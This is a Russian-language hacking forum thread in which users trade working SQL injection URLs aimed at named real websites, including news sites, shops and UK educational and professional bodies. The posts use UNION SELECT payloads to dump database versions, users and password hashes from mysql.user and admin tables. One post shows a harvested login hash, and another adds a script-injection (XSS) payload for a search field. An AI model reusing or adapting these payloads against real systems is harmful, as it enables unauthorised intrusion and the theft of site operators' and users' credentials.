SQL Инъекции

http://www.jezuk.co.uk/cgi-bin/view/SAX/news?id=-1+union+select+1,2,CHAR(104,101,107,32,98,121,32,103,101,110,111,109,45,45),4,5,6,7/*

найдено с помощью google dump-er =)

 

Code:

http://www.centrgroup.ru/news.php?id=-8+union+select+1,user(),version(),4,5,6,7+from+users/*

чтобы увидеть - Ctrl+A

 

Code:

http://www.centrgroup.ru/news.php?id=-8+union+select+1,version(),concat(user_name,0x3a,user_pass),4,5,6,7+from+users/*

Vitman $):91ff3b06ff2c762ecf4a7b7b272d3752
ctrl+a там не нужен

 

Code:

http://www.cmsnx.com/product.about.php?id=-5%20UNION%20SELECT%201,user,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+mysql.user/*

www.truebasport.com

Code:

http://www.truebasport.com/shop/articulo.php?id=-29+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(login,0x3a,password,0x3a,id,0x3a,email),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13+from+usuarios/*

 

http://www.rcn.org.uk/news/display.php?ID=-1+union+select+1,2,3,4,5,CHAR(104,101,107,32,98,121,32,103,101,110,111,109,45,45),7,8,9,10,11,12,13,14/*

ух

 

http://www.education.ex.ac.uk/pages.php?id=-1+union+select+1,2,3,4,5,CHAR(104,101,107,32,98,121,32,103,101,110,111,109,45,45),7,8,9,10,11,12

я простой сталевар я варю жесть

 

Code:

http://www.merid.org/NDN/more.php?id=-925+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*

Code:

http://www.enrichuk.net/news/article/?id=-355+union+select+1,2,3,4,5,6,7,8,9+from+admin/*

Code:

http://www.consortiumuk.net/news.php?id=-16+union+select+1,2,version(),4,5,6/*

 

2random

 

Code:

http://slovari.299.ru/word.php?id=-1+union+select+1,concat(database(),char(58),user())/*

 

Code:

http://pogoda.ru.net/weathernews.php?id=972+and+1=-1+union+select+1,2,3,4,convert(version()+using+cp1251),6,7,8/*

таблицу не смог подобрать =\

 

Code:

http://metalistfans.net/news.php?id=-143+union+select+1,2,3,user(),version(),database(),7,8,9/*

Code:

http://www.legia.net/news.php?id=-22483+union+select+1,2,3,user(),5,6,version(),database(),9,10,11,12,13,14,15,16,17,18,19,20,21,22/*

 

таблицу не смог подобрать =\

 

Code:

http://www.nchtuk.org/content.php?id=-122+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(user,0x3a,password),0x71),0x71),3,4,5,6,7,8+from+mysql.user/*

 

http://arteam.accessroot.com/tutorials.html
В поиске пишем наш код, в данном случае на примере

Code:

"><script>alert('xss')</script>

Выдаст ошибку MySQL ну а там разберетесь))

 

попрошу без экстримизма на arteam.accessroot.com
ни4его не косить

 

Code:

http://www.poplavok.info/index.php?mod=article&act=art&id=-1+union+select+1,version(),3,4,5/*

Седня залез на сайт про карасей прочитать, скоро на рыбалку ездить буду, и сразу скулю нашел )))

 

А кол-во столбцов может иметь неогранич кол-во? А то я тут 100 ужо проверил, но не подобрал.

 

Code:

http://www.my-tours.ru/calclient/biz_op.php?business_id=-1+union+select+1,2,concat(ecard_sname,char(58),ecard_sip,char(58),ecard_semail,char(58),ecard_rname,char(58),ecard_remail,char(58),card_image,char(58),ecard_heading,char(58),ecard_message,char(58),ecard_sig,char(58),card_template),4,5,6,7,8,9,10+from+card_user+limit+1,1/*

to ЛифчиС5СВ

Кто то скулю выкладывал там было за 100 колонок, а вообще смотри внимательнее мог не заметить, если к примеру вывод в тайтел.

 

order+by+xxx уже не в моде?

update:

Code:

http://news.qs.kiev.ua/lenta/news_full.php?id=56484+and+2=1+union+select+1,convert(concat(user,0x3a,password)+using+cp1251),3,4,5,6,7,8,9+from+mysql.user/*

 

Code:

http://www.clasno.com/foto_pr.php?id=-1+union+select+1,2,3,4,convert(concat(database(),char(58),user(),char(58),version()),char),6,7,8/*